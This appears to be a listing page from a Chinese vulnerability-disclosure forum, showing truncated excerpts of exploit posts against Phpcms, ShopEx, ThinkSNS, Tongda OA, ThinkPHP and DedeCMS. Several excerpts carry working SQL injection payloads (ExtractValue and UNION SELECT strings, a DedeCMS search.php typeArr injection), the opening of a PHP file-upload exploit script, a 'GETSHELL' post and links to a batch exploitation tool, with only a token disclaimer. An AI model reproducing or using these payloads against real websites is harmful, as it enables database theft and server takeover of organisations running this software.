当前分类

漏洞公布

T00ls新年礼物之三:Phpcms V9 短消息回复SQL注入

modules/message/index.php public function reply() { if(isset($_POST['dosubmit'])) { $messageid = intval($_POST['info']['replyid']); //判断当前会员,...

新年礼物:shopex通杀注入两处

作者:伟大娃娃 http://www.unhonker.com/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html http://www.unhonker.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/...

Thinksns 2.8 文件上传漏洞分析&完美利用

作者:wepeng 存在漏洞的版本为:最新的2.8稳定版。 漏洞分析省略。 Exploit文件内容如下: <?php error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $port, ...

通达OA 2011-2013 通杀GETSHELL

转载自T00ls 此程序应用于非常多的政府机构, 教育机构, 以及各大一流公司(中国电信等)! 请各位看完本文后不要试图对任何使用本程序的网站进行破坏攻击入侵等... 本人发此贴纯属技术交流探讨, 并无怂恿别人去尝试攻击的意思! 若不接受...

thinkphp框架下mysql注入

作者:tnt1200 Wamp环境,用thinkphp框架制作,手工检测发现一个注入点。 /content/117 and 1=2 union select @@datadir,2,3,4,5,6   这个注入点同时还是一个反射型xss,id值被写入到了内联js里。   接着提交 and 1=2 uni...

DeDecms最新plus/search.php漏洞批量利用工具

作者:shine 手工的方法看我博客: http://www.unhonker.com/bug/907.html 工具下载:点我下载 源码下载:点我下载

[通杀]dedecms plus/search.php 注入漏洞利用方式

作者:鬼哥 看结果如果提示 Safe Alert: Request Error step 2 ! 那么直接用下面的exp /plus/search.php?keyword=as&typeArr[111%3D@`'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2...

1...2223242526...34

插入图片
返回顶部